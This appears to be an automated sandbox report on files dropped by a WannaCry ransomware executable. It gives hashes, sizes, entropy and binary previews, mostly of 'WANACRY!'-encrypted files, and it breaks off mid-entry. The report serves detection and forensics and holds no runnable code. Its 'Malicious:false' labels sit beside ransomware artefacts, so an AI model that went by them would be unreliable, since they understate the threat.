                                                                                      SHA1:22B9B0E8F53642F8BAC8B797D292AB2FEED05F0C
                                                                                      SHA-256:08E80A8828FF94293ED459EF396DD77F9FE66F60D8FA977A9FE6D3EE8FB34E47
                                                                                      SHA-512:57AA2AD0DFBE29DEC8E72C92EC4892389E374F9B4A4F9C7957DBA6D8B3B75A310A4C5702A1579A1EB19E2A0BF738FD15EA962A26653295901BD9BF9C1A320580
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....1k'U..,..d...4!....H...%.s.....G1p.=.D...........\'.m?.B.. 3.d.}r.2@(....J.d%.....I...).2..p.d..M....'...~..E....R....H.Q#.i.$Y...AG.1...".%.W..i_........._F.b.....&b^|8.Q....l.....3....SY..Y1.=V.^-\..........;......>.F.}.4.......$.M.............=Z.....G>GX.....R.3n..?.'...I.6|.).r&&\C...M......D....B..L.....g....#n....Q.<.R..#M(..Zt.Y.*...Fz.....mr}>f.3........vp..D......v.u..mf8$/......_..l...`a.L..o.]..[!....O...U...^..P......_.v9..).....H.T......<).......L.R.w..^.x6......W;..E..(D... .Ho...T|LDc..R.....T....Ih./b..............hc${)PI.+!.9r.D...D.??E..=F..h6..2G...Uh..:6...E..B...*.W>?.s4Pke<.E3eA.uR.m.M."..u9?.g..*.}b..3.;./.u....z.....*..m.|).9-s....B5...4Q....*.....Q<m..z..ko1B......k...L.H...2..7..o....L.9.......C(~.q.....Y.....|...&....q...kL..~g.......F`..O..j..B.6.aB.0.'.).O....3u...z....SB.F]..N..elzJ....?y.e......v5....U.:.&.....%).w....1.?.`0.aa..@.U.k....R..c...9BF....7..._N.W.e...+........!...\./.P.,...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.833102779247918
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkvD5dJHNpviNQ7briDGNI+DBxiHn3HclIVhLU+BacrccyfVPuIHMV:bkvD5dJHbvoQAmlDByHc6Vh4+xrccSHe
                                                                                      MD5:C88F5132D01753C32C1C736CDE3523C1
                                                                                      SHA1:22B9B0E8F53642F8BAC8B797D292AB2FEED05F0C
                                                                                      SHA-256:08E80A8828FF94293ED459EF396DD77F9FE66F60D8FA977A9FE6D3EE8FB34E47
                                                                                      SHA-512:57AA2AD0DFBE29DEC8E72C92EC4892389E374F9B4A4F9C7957DBA6D8B3B75A310A4C5702A1579A1EB19E2A0BF738FD15EA962A26653295901BD9BF9C1A320580
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....1k'U..,..d...4!....H...%.s.....G1p.=.D...........\'.m?.B.. 3.d.}r.2@(....J.d%.....I...).2..p.d..M....'...~..E....R....H.Q#.i.$Y...AG.1...".%.W..i_........._F.b.....&b^|8.Q....l.....3....SY..Y1.=V.^-\..........;......>.F.}.4.......$.M.............=Z.....G>GX.....R.3n..?.'...I.6|.).r&&\C...M......D....B..L.....g....#n....Q.<.R..#M(..Zt.Y.*...Fz.....mr}>f.3........vp..D......v.u..mf8$/......_..l...`a.L..o.]..[!....O...U...^..P......_.v9..).....H.T......<).......L.R.w..^.x6......W;..E..(D... .Ho...T|LDc..R.....T....Ih./b..............hc${)PI.+!.9r.D...D.??E..=F..h6..2G...Uh..:6...E..B...*.W>?.s4Pke<.E3eA.uR.m.M."..u9?.g..*.}b..3.;./.u....z.....*..m.|).9-s....B5...4Q....*.....Q<m..z..ko1B......k...L.H...2..7..o....L.9.......C(~.q.....Y.....|...&....q...kL..~g.......F`..O..j..B.6.aB.0.'.).O....3u...z....SB.F]..N..elzJ....?y.e......v5....U.:.&.....%).w....1.?.`0.aa..@.U.k....R..c...9BF....7..._N.W.e...+........!...\./.P.,...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.811879963003176
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:JU69H7upXeEyJOMgAUFRblTrHzKh6j6msWB29jdgrC:JU6V7upXerHg1RbJfKa29pUC
                                                                                      MD5:D939EDE8C65673A3C4A2BDF7C96AA92E
                                                                                      SHA1:8EAB22B54DBD749D0A4FDDED120D3E3E3E3AAA01
                                                                                      SHA-256:512D8831025861D60FBCB1F021757D3875741CDADFE22D65D0203982DC18E90E
                                                                                      SHA-512:547B145CAF47A40AC1999B20A201F95C2014FA3E1C683B6DA91B0C439389DDCA232EA8941845A42F3DA09FD8E3B4CFD73191F1D32F42C9F79413C93AFF157D0F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:......$...hU.|.......xqO..n.....L..Fcg>....$W.8..>.7].......A.[....c...Z..r...I~....8e.l.a.....59.U!a..(._L."....v<..'...0K7..o......H:.G........o.h....a?V9.....>..P....Y..U|1..y.m2...=,...0...$_...w&..y....S.N;{{...T.B.,...._....!.;}yQ.{.[..{..ox@........k..r.`.x..7j......j5.Q...s.+.Jp..|G..L+Wc.Yt..h*9g@.....e..k.-.0l.......f..;.....T.?B.wc...R..@..*.~t...9.7.A.....L\J........b...............mP|...B....j}.T.l>..{.u.5I..B....K#!.6h....Q......rR.=Q...y...U3.?..`.......Cn.!I....=}../6J..z-.K........K...an..q8.l.......el[>kk.....?.@.....wa...#.(..}.1x,.P..w...b..Jc%......(^u.T.&gO\t.D...V.7..../...r.......z..n....H.4.6._...A....R.......x.'p.&...C....4.3..h..S..&5..W....O?.....'.,..?..&0O..b...|.....?..Ou....4.....t!Z.Z..$-.V.L........`....Jh...\.)..C....lU..`.;_...GF.^.Z...$...T.i..j..L..g.?...x..:..9..wn.\Z.W...5.f..x3w..7O..\Fg.v......;Isp.c{...7U&.F-..y..}C..d...-.l..(...OD.....>..Y..5y.).;\.Ad./.y.L......d.&.[...V..nAjT.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.85095702760798
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkee60ULSr2yty3jwTk8H2YxkvSifZHwnExlptCkudDtXjxsSFPgTrM:bkeB0TVt8jisYx+fG8ncXjxsgg0
                                                                                      MD5:AD4546B89DD4CFEA9AD4F3D45CB8DFF4
                                                                                      SHA1:E67E6BEE364E1278866F47BCB9BC73136B5561F8
                                                                                      SHA-256:86191F8A94EB0E3323F3E58F079A3F523745FC8AA8FB620F8AF90851FF3D307F
                                                                                      SHA-512:BA69B408A6A4654151E58F05ED010376B40005C4C15DA695FC8DD68E6BA72FE8A2C36336DAABE9BCB50D4BD09C0AC22E432A62CBAFB5775266FDB82D28BFC474
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....X=..?!..ow D.;.To.V.....+...n.T-.$. V.Z+]..Bn...].+....P.{K5RU.0f.....h?.0.6.P!...N9...0V.rV....?..hC......*/.. ._H..$d..d~.=A.pD0G.j..Q..\.x8.....o.5....s.}.]b;<G...K.T..Z.....S5...!`4,Z....J.WM..B...A...t.".:L.5...&~0...w...!%.h.....A<}.i.WO...............G.W.....A.'*.......t2......W..|.C...Ba.0zR......2..VI....t.L..yOR ...A..]I......+f.OD..t.......j;|N...7X.....CUH.).]G..f.K...".H..1DN.)g...w.:%..M.2.....M..........?...<V.CN`.y.v........[0Y.J........3........%m.(...?..8Z.7....#!..K.}.f.N%....L7..+FD.....P...s.T..:..s..$...JO.>c.d.W[..t.......~.6....T....2..'..F....M2.avz]..8I.....z.=...].6.W..{S1t4m.}..B=.>.9F-rn-..T.Z.9Z.hd.`..A.....|*{W.n5...".}*..kes,..mMF.d........Q..\.@.\..+ ;{.}......]..v.ub............N.. ......v.4..1.7.LSU.W.G.....F.~s\}...q...aW...Ri.6&Z...l.W.^.M.Z.....,9..1s.`.......A/.NS.-pW.......cgs^..H.C...o,D.O.9..x.Oc.E.......<2.I.....).W5....G.".E.....h..}i..U.x....?............`......[.Yn..d..2.6K...!&.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.85095702760798
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkee60ULSr2yty3jwTk8H2YxkvSifZHwnExlptCkudDtXjxsSFPgTrM:bkeB0TVt8jisYx+fG8ncXjxsgg0
                                                                                      MD5:AD4546B89DD4CFEA9AD4F3D45CB8DFF4
                                                                                      SHA1:E67E6BEE364E1278866F47BCB9BC73136B5561F8
                                                                                      SHA-256:86191F8A94EB0E3323F3E58F079A3F523745FC8AA8FB620F8AF90851FF3D307F
                                                                                      SHA-512:BA69B408A6A4654151E58F05ED010376B40005C4C15DA695FC8DD68E6BA72FE8A2C36336DAABE9BCB50D4BD09C0AC22E432A62CBAFB5775266FDB82D28BFC474
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....X=..?!..ow D.;.To.V.....+...n.T-.$. V.Z+]..Bn...].+....P.{K5RU.0f.....h?.0.6.P!...N9...0V.rV....?..hC......*/.. ._H..$d..d~.=A.pD0G.j..Q..\.x8.....o.5....s.}.]b;<G...K.T..Z.....S5...!`4,Z....J.WM..B...A...t.".:L.5...&~0...w...!%.h.....A<}.i.WO...............G.W.....A.'*.......t2......W..|.C...Ba.0zR......2..VI....t.L..yOR ...A..]I......+f.OD..t.......j;|N...7X.....CUH.).]G..f.K...".H..1DN.)g...w.:%..M.2.....M..........?...<V.CN`.y.v........[0Y.J........3........%m.(...?..8Z.7....#!..K.}.f.N%....L7..+FD.....P...s.T..:..s..$...JO.>c.d.W[..t.......~.6....T....2..'..F....M2.avz]..8I.....z.=...].6.W..{S1t4m.}..B=.>.9F-rn-..T.Z.9Z.hd.`..A.....|*{W.n5...".}*..kes,..mMF.d........Q..\.@.\..+ ;{.}......]..v.ub............N.. ......v.4..1.7.LSU.W.G.....F.~s\}...q...aW...Ri.6&Z...l.W.^.M.Z.....,9..1s.`.......A/.NS.-pW.......cgs^..H.C...o,D.O.9..x.Oc.E.......<2.I.....).W5....G.".E.....h..}i..U.x....?............`......[.Yn..d..2.6K...!&.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.820456288895583
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:eShOiIAot7BKXrHQvPWn+1LUBHQE7UuR/LzQDX47J3/fdDM6rZR/N6vMMHdG0cAP:TORnKXEvPWcm0XG3/fhM64tHdJZuee4n
                                                                                      MD5:14986A111298E7E0D491024325E8EFB7
                                                                                      SHA1:944803F6AA4CBCA10507602CB15CB131110A438E
                                                                                      SHA-256:934243E44D83695D6D2ECCCC4981442FAC9C6ECE18E58FEAA11DE41717D5066F
                                                                                      SHA-512:48D566D4C0C99DB11BB568C2EE04D6B97C2DA69BA4FF7A0E86ECF6C70D5F7E79BCE6126D5B70123503F15F3DDD25948948F76AA60E220A1ED5817B467F6F0512
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:=...e...y..'r[\k.!~..J).<...M.oAv1...^.V.9...m@F..&.<.d.-.7....+...n.80....O{.Y.zw....1!..t..|..AU......u..h.A.t$.]6Tp....0w.GPz...H..j|....-.....|....SK0...![.`..yF...c..... g...ee.o..m.."n..N..cA..y......F.2.fq..7NY'........!.?...~.kN^.O.`. .Ey]........Nx..>..e.........Kb.S...+....4...Exi..z-4.$5wp...si0.(<.....n.%...=.R..5.R..~)....=..>.I.;.9..n....\>Y ...e.T+h....2.q.q.i+././:p.= 3.S/.m..=.........!...&.Mv......&...5T<.|.z.........J.m.*......N.1.........(...SA.!}^e...u.n]5..07..YA...W........E.V..H...]*;pbt.F......k.yo....<....'..0..$*9i.R....!>n..Bs..}Q.3$/.q.J..y.(.].~.R...._.<S.xAj..pz..:q.K.[.....4Q{.AP;-..{m\.F>)9+.Uf.D.E.7.7.#......|...P?(..Y...'..._:.....j..z.......S2=.;..:..g.K.|e..p.H.~.i.W..!.(.4=.>...Av.....u.yy.Z.;..G.$.,.0p`.FLV..M.......... 8f........(4.....[.z1,].....?..V.|..Q..^..H...L.l...a.........['..m.1.....*.........}0..B.NF..W....*...44D+..IP.....y..c.EA$.s......W;....[........C...\P#V.... .s'.QO..W...@.p[....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.826969646176868
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkHqBgLtMYW4ogfKMhGVCAVcItxRDOi9Jvel8C5YnuYEytc0hNurboL3zMofUQxJ:bkHSEyYWpgyGhAxxBB9JvelRmnulytcw
                                                                                      MD5:E2BDFF0EBBC75D5FA79439DD481A1259
                                                                                      SHA1:FA4E4B454D2D3F20F5EC0319ADFB6E0DDFD31056
                                                                                      SHA-256:3AE9687426D8D690C239D99BFD68F0A7A4752A4B6FF924D6921370D897681D79
                                                                                      SHA-512:A63DC0CAF4201D03CEA0120556FBA3C9075FA49FB0CBF62035D02953E367FED6DFCEF8930BEEC5061A6E5544A2352F6E7AEA6E8AE9B71E6E300F97DFD94B07FD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....z}$...x......se.E..s..j..`...Q...b1.O...q}...I.6.[...............9cnd.#>.qMt..P.}.~...3..o.gs4........8G.%+.D..R./.\(ZH.e..U...d.4... .....=9a....U.....(...!..+;&t.Qa.e.Z.S.....e.A.T.....gfN.....b9....]_b.{xk?_.....7.........M..by. 6.......R......................K.b'a.t..a.%.Y.....-u.T+..\..}.5.:.1e..2.Qu.3..-.\Cx.....A;..:..5....D>[.YGC......V)..q...|..L}.l...x....H^.f\.a....V4.6. .!T.R.3.]`......B....4....:W......tW.|q.^..<.n....3....Q4.2?.....f.g7o.`...9...!..bj[..S_...md.j...kfe.P.....@F..S.%.FR|Z.....1zd.?J....!.3..J.}./c]..t...,.f.enV*..mp.....&*...D.RzQ."6......k...n...iU..N...............M.^R.q!6.....-..Y.P......w...`.......6.6.#T.%H./..7U.....8=...9z.f^....n4pC.}y.'.CAf....zS..`.... ;d.!.G.3.C.z+S.C.i.i......n.....rn... .!.......yxT...&xk..5_.r.8...Q..%T..eSR.8Fk.(w.0p....!!+'l......%)(.].._.5>.................g.n..TT...Hk6..l...}..C...NT...AB,....([..G 5,>M.z.....={G..k1.[q$T......`p8M..V<5..!..wM~...e...}.j......"...MFk.(.3
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.826969646176868
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkHqBgLtMYW4ogfKMhGVCAVcItxRDOi9Jvel8C5YnuYEytc0hNurboL3zMofUQxJ:bkHSEyYWpgyGhAxxBB9JvelRmnulytcw
                                                                                      MD5:E2BDFF0EBBC75D5FA79439DD481A1259
                                                                                      SHA1:FA4E4B454D2D3F20F5EC0319ADFB6E0DDFD31056
                                                                                      SHA-256:3AE9687426D8D690C239D99BFD68F0A7A4752A4B6FF924D6921370D897681D79
                                                                                      SHA-512:A63DC0CAF4201D03CEA0120556FBA3C9075FA49FB0CBF62035D02953E367FED6DFCEF8930BEEC5061A6E5544A2352F6E7AEA6E8AE9B71E6E300F97DFD94B07FD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....z}$...x......se.E..s..j..`...Q...b1.O...q}...I.6.[...............9cnd.#>.qMt..P.}.~...3..o.gs4........8G.%+.D..R./.\(ZH.e..U...d.4... .....=9a....U.....(...!..+;&t.Qa.e.Z.S.....e.A.T.....gfN.....b9....]_b.{xk?_.....7.........M..by. 6.......R......................K.b'a.t..a.%.Y.....-u.T+..\..}.5.:.1e..2.Qu.3..-.\Cx.....A;..:..5....D>[.YGC......V)..q...|..L}.l...x....H^.f\.a....V4.6. .!T.R.3.]`......B....4....:W......tW.|q.^..<.n....3....Q4.2?.....f.g7o.`...9...!..bj[..S_...md.j...kfe.P.....@F..S.%.FR|Z.....1zd.?J....!.3..J.}./c]..t...,.f.enV*..mp.....&*...D.RzQ."6......k...n...iU..N...............M.^R.q!6.....-..Y.P......w...`.......6.6.#T.%H./..7U.....8=...9z.f^....n4pC.}y.'.CAf....zS..`.... ;d.!.G.3.C.z+S.C.i.i......n.....rn... .!.......yxT...&xk..5_.r.8...Q..%T..eSR.8Fk.(w.0p....!!+'l......%)(.].._.5>.................g.n..TT...Hk6..l...}..C...NT...AB,....([..G 5,>M.z.....={G..k1.[q$T......`p8M..V<5..!..wM~...e...}.j......"...MFk.(.3
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.790629141189544
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:cRcmUud/5jAeD/OJwGwbgBHkRp0m6g5NXnSDDUC5uhxue:cRcmxdhcJGbg0B6grncDUCGp
                                                                                      MD5:35C7815105007363AE64A134D832F4F3
                                                                                      SHA1:0CEC8B49A65CC24953B59418518019BD7845EC1E
                                                                                      SHA-256:7B915768BA1BC5ED3DC89C8A5F071AD5FC347AB1553F7FEC6D5565384932F5CD
                                                                                      SHA-512:5AFAD3542E951FF70C8F7F403F5005A84A11DA2C923C2B3021D0534384307DCF3037266A4333C1B3077F9BF59F630FBDF023A92D7CD5BF87227F29C99502B49B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:E.?...-..\m...?;........Q..0..R...}.......3.~.Lx....R..B,V.d.zyP...E...c.}.l|...[>.F...ya.E...=..(..@o.(;......S{.%'......6<#L.I..q.S.=..*..Th..5....i...`.Z.&..@k.R.)..2"}...fUm..J.;...u........>_.qaX.E.1.{...../....|.....2$u.?..-...ZM....U...g.+...T..g.'.vGqU...$...,[.......W.b..r8.....G....`uWQ..{.".`.n...F.......:.....z....'...%bE-#E.-i.&;.\~K1......Ae..!I..xE.^.z.B.[I"..Qs{.|.p...)..b+...w..<5....@..$...|.qLw.(..s...|b.W8..b.S..P.....Y.k+...+.E...s. .....No.....L...9...MV..._V..T0...d..C=..]..L|.V...NuHZ.....}.P..;.....F=...'.e(.i...y.S3.b.(...\..+..(D....Y.rX...[....(.....^x=..X.....M.ti.x..d..p.V.k.QU.."M3.....I.[.T.....e"."6..=.C.....!e..i.[....\.J\.../r.f..G..\TZ.5..S..:.T.zZ.%a.pP.......f.B.m..-....{C....\...'.C..r..H.R^u..].L.U....>...T....j.6.......R....y-....Y$.T....k......`.|g.o/...1...@\.A..j..,SMC(...Q.6H..<.m^ .,o<...D...W..Jv.k.X{E9.....p;.a..!.P..@L. ..)5D1.....~A..';N....\.B.....2.bJ..Rd.'.."w.[4X....T"..L.]/.=~f....b
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84680142685089
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk7+QWFF6TvhsyWG5rWywx8OaM3ttxX2FCIrUSJzG98RZAXbT4B6D0KcwG6:bk7+Q0qhs5WrrOZdrmrU8C9So42LdG6
                                                                                      MD5:49A4F807B5C11872641591C106C68A1B
                                                                                      SHA1:BAF67963E75318F36A13E2FAF3276617B88E1DEB
                                                                                      SHA-256:5FF1140C5190BC22A0A58A859BF943C75890A98E39D7912FC7FC01D065002362
                                                                                      SHA-512:C3308656FB7176FC43D3BDDB11C7015D6EB30563080F9EDBB758E35F0C041FBB827A85AC0D7EBC1D6225DAEBD90395F537EF38C49A1477FF209527C1972CA392
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.... .vd...3.k...W .%[+{../.|jG...',._..H..#|......t...2z.G..Q....T..[....MW\aV.^y..s...h.B5..u.......t...pr.b.=UL.....b.=.....Xg9Z=.a.....K..'..;....\2....\t...u.L..RT[Y.-7.m.bk, .$L..$.1s..]..z..-..o ..9.N"....Y..Jn..9jM#s..$x.C..vZ>.F1..*6................k...%..g.f.......s...y....j.1..a..N.=..Sn!....o7"..I...M.-O#...i.......H.#...$h.:.C........a4w2.7Da.7...2.f...g.eu.f.X.m-.=...+.aVi....,3j^oaU...y M'.u..... .f..(.]<...Z.j..O..- d...v..x...1.......<.=..[.fJ.k.>..K]5.. .j1.....i..OvV.<Pg....GY..u.....s.:{.. o..V.k.n...L=.L...$m.B....u.m.P..#....C..j.w.)x..z..f......1.l+b)..Y.zC..T..<.....Ll....o.v....L..ah.B.....PQv`...(&...h.....H..q....U`.k.=.^lUq.E@...H.+.$...P......]...d%a..9..#.....`.bv6.........<.+..k-(F/=B.=..pKm.N.&n@...20....Y...._O...f..F....[.u.Tl."y....."....U..xr*..Z`.eG..=.u..!.....7lM..I......7.h>}..,..0L...:.k..n..<.4.u.0..Od../.AA.............R?DT...R'&....)....g.v..0.p......1....\.#a3.Y..(.....u..R1..N
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84680142685089
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk7+QWFF6TvhsyWG5rWywx8OaM3ttxX2FCIrUSJzG98RZAXbT4B6D0KcwG6:bk7+Q0qhs5WrrOZdrmrU8C9So42LdG6
                                                                                      MD5:49A4F807B5C11872641591C106C68A1B
                                                                                      SHA1:BAF67963E75318F36A13E2FAF3276617B88E1DEB
                                                                                      SHA-256:5FF1140C5190BC22A0A58A859BF943C75890A98E39D7912FC7FC01D065002362
                                                                                      SHA-512:C3308656FB7176FC43D3BDDB11C7015D6EB30563080F9EDBB758E35F0C041FBB827A85AC0D7EBC1D6225DAEBD90395F537EF38C49A1477FF209527C1972CA392
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.... .vd...3.k...W .%[+{../.|jG...',._..H..#|......t...2z.G..Q....T..[....MW\aV.^y..s...h.B5..u.......t...pr.b.=UL.....b.=.....Xg9Z=.a.....K..'..;....\2....\t...u.L..RT[Y.-7.m.bk, .$L..$.1s..]..z..-..o ..9.N"....Y..Jn..9jM#s..$x.C..vZ>.F1..*6................k...%..g.f.......s...y....j.1..a..N.=..Sn!....o7"..I...M.-O#...i.......H.#...$h.:.C........a4w2.7Da.7...2.f...g.eu.f.X.m-.=...+.aVi....,3j^oaU...y M'.u..... .f..(.]<...Z.j..O..- d...v..x...1.......<.=..[.fJ.k.>..K]5.. .j1.....i..OvV.<Pg....GY..u.....s.:{.. o..V.k.n...L=.L...$m.B....u.m.P..#....C..j.w.)x..z..f......1.l+b)..Y.zC..T..<.....Ll....o.v....L..ah.B.....PQv`...(&...h.....H..q....U`.k.=.^lUq.E@...H.+.$...P......]...d%a..9..#.....`.bv6.........<.+..k-(F/=B.=..pKm.N.&n@...20....Y...._O...f..F....[.u.Tl."y....."....U..xr*..Z`.eG..=.u..!.....7lM..I......7.h>}..,..0L...:.k..n..<.4.u.0..Od../.AA.............R?DT...R'&....)....g.v..0.p......1....\.#a3.Y..(.....u..R1..N
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:OpenPGP Public Key
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.784075471106713
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:gtqJ9CID90SsA1IwuMBJmPT2OZV5iSgaCJqB9B83fiHKJBIPjzE:gtqJ9xDTjnKPqOZV5rgFBqqQXE
                                                                                      MD5:9F111A72DF69B9C5888473CC241BC298
                                                                                      SHA1:3A79F3D8F532024E2A03BB53B0DB6716CDBEE093
                                                                                      SHA-256:982E8E51D01BFEE2B6745496AD35812BFFD280F0C58C0968F004AC8DBA918D79
                                                                                      SHA-512:B37AF930A5F1AA9BD14288BAFD43BA4977D6BA32F783BD8F6D65A4FF9023DAF3844611DF694B21C71B29E13D00206B939054472259F3EED08CD59149DB8B3F12
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.....gsw....l.M,./-..3.x.'.;W._..').ij......V.W....s..|R..k6..W.....0..W.._t-..?k..j..MT..].....kB`..f~..wo...k...$..U.Z`~..+.0....e..:.Tt.C...R.h.!..............y..us.....*t9...~N....E.#.^J..E.^.C.nE..7g...Z...{.$.2.}./`!.bBW...a.`...:..8..4Y..D\".C....Ft..<.......t.&..&......\..'<.w....#.$U.u<..%..z.=5...JL...S".?wS?.P...!.|.....ip,5......w.|9..h.....-......|..<nH.x...L.Ki..[n_1]?)...o..b....Nr.a.P..5...E-.P!....F..Q..`.[.u.O.j.1.r]...e..z..)n..s..H.o...d~a.S..V.....cE.l."....E.N....bv.S...\w..R\....yW_....YF.D.U..i.....].....gFo...H.$.c....$.rw"0f...kF....s.=v.2.@..#...n@LV.....b.].}H=..X...6il.RPo.....W..d..8x-..H...2L..U..g.`\.{H}...W..[o..Bo?..E.DP....;...EX..{m"...'.....k]t..8..`..c.._.S`..G..E.5.....!.o*..;.#xsr.o.ae.0........-.{.__Z..;....).....Q&EQ........cIdR.......9......}O.0;QY[.....#..L..f....:...%...~X.:..T.LN>..K1Z..#R...QcF..0.....=....o.(.1.7'.....B...$.V@..pe..v..g..s.t.e..x.@.\...M.B.g.........)*.#...).HY*....7+..'...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.83403786860198
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkhOkWRRPWAq+Qbi8JBEGnrEMggTcICmeUPRDOqL2zw3o+NbgfPQpCcrQer3d2k/:bk6ROU+Qnec/0PAhw3o+NbUOt2kTo1a
                                                                                      MD5:804127BB2CD7F1A590469343DDE119D2
                                                                                      SHA1:B2EF97282FA49E4B9C0221CF024E14828531F3C6
                                                                                      SHA-256:583C5FCBB1211EA7F4AACB9ACCED4EC7411DEAD84EE15C45FE30E9D85548CE2E
                                                                                      SHA-512:601DB8291A302CD445BFCE1983A4676C93C3B27FD6FE93CCA692BE79FBCA6A5C361C18138C01FF07F322F0B98E5190C3B548484FB11A99ED961047A5BA2AB4F9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......3y+t...Y.!N..%..~...._.`^.=...V.......m"..C...v7..(oHJekOWL..c.k.......v1.u.F"..awz.L..$lNz.]...}[.h.q.V.C.{..{^.k].^M.R..[ .+.U.S...k.A...C..J...K..]+.C.......A.DN...........-t.p.....:!..".p71...^2.DS#(~....&..]0v.6.a5ck.#.X.....w.ET.&....3[..............&.....9.cS.i.x_6.,.3<...........g.|.X=.BU...s>..N..o.*.....f..j=.p..5.lGH.^B.CG...[J...ne.......>.-.V".!...}.:."U.=.x%e.a.,.0,u....{.G$..d.i......=(L...o+1.~..x$Dd..JP_........;..f.........n....)......(=t.g@...q...8{../...WH..#..*.M-.k..Z....q#.......$...l.......+....T..(...33x.}h..+.....F.gzcQ...5=M.!...V..'...}...m....'.r.E4hkiB..\A.d..jm3.{.eO......y.l.in..?.a.....L.y.&u.3.I......v..~e.G...*..Q.. 4...m..@.....|....|[&v.....l...N.5....-.O.F;..=g.....M[4c9....m......9..#.tD,.\S9....W<...#.....<.%~..}....\.O.@X..r....IT.....5Q.<V.=........~CL...$.T.....C.:...S.*#...7<.u......Y..T......2.....z... e-.0....b....^.X....OX.d...n.%a~.]....K....0&.m}^...AT..o1n...e..%.o...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.83403786860198
                                                                                      Encrypted:false
